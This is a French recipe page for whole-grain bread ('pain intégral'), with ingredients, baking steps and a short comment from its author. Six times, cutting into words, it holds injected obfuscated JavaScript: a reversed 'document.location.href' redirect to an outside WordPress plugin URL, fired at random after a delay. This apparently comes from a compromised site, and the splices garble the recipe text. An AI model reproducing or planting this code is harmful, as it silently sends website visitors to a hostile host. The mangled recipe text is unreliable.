PAIN INTÉGRAL

PAIN INTÉGRAL

Pour 1 Pain

INGRÉDIENTS :

– 150g farine de petit épeautre complète
– 200g farine de blé intégrale
– Farine de seigle 50g
– Son d’avoine 50g
– Gluten 50g
– 1 cc sel
– Sésame noir 2 CS
– Graines de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tournesol 2 CS bombées
– Graines de lin 2 CS
– 1 sachet de levure boulangère déshydratée
– 1 CS sirop d’agave
– 350ml d’eau

Mélanger toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les ingredients secs dans un saladier


Chauffer (tiédir) 350ml d’eau et rajouter en un coup dans le saladier.


Bien mélanger à la main pour obtenir une pâte collante.


Graisser un moule a cake avec un peu d’huile d’olive et fariner le moule


Laisser la pâte monter 30 minutes dans le four préchauffé à 60 degrés.


Sortir le moule du four et augmenter la température à 220°.


Cuire 20 minutes puis couvrir d’aluminium et prolonger la cuisson de 15 minutes.


Démouler et laisser refroidir sur une grille

Le petit mot de Joanne : Le pain intégral pourrait se définir comme un pain “plus complet” que le pain complet. C’est le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top du toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top quand on surveille sa ligne et sa santé. L’essayer c’est l’adopter, je ne fais plus que celui là !

Un pain suffit pour 2 personnes pour une semaine entière (trancher le pain quand il est froid et le congeler dans 1 sachet congélation avec zip. Il suffira de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toaster les tranches quelques minutes au grille-pain.

Pain intégraltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

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